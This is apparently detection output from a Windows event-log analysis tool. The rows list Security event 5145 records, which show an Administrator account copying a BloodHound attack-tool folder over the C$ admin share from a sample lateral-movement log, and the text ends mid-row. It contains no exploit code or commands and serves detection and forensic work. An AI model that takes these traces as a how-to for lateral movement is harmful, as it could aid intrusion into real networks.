Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 